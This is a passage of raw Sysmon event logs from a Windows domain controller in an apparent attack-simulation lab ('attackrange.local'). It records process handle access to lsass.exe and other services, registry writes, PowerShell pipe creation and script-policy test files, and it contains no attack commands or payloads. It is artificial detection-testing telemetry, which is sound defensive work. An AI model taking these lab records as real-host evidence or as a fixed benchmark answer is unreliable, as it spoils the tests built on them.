12:00:49.659{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.659{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.596{266CAFBE-646C-6064-1000-00000000AE01}11242508C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.580{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.580{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.565{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.549{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.549{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.549{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:49.252{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000392) 13241300x80000000000000001395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:49.127{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 17141700x80000000000000001394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:48.862{266CAFBE-646E-6064-1900-00000000AE01}2276\PSHost.132616656461464114.2276.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x80000000000000001393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:48.862{266CAFBE-646E-6064-1B00-00000000AE01}2292\PSHost.132616656461682956.2292.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x80000000000000001392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.674{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Windows\Temp\__PSScriptPolicyTest_0ahsxzwi.tlc.ps12021-03-31 12:00:48.674 10341000x80000000000000001391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.627{266CAFBE-646C-6064-1200-00000000AE01}11961472C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.627{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.612{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.549{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000001385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.502{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_4hkwd3pk.0id.ps12021-03-31 12:00:48.502 11241100x80000000000000001384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.502{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ps5qufdy.yg2.ps12021-03-31 12:00:48.502 10341000x80000000000000001383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.440{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.440{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:47.799{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:47.315{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000391) 10341000x80000000000000002419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.973{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-5300-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.973{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.973{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 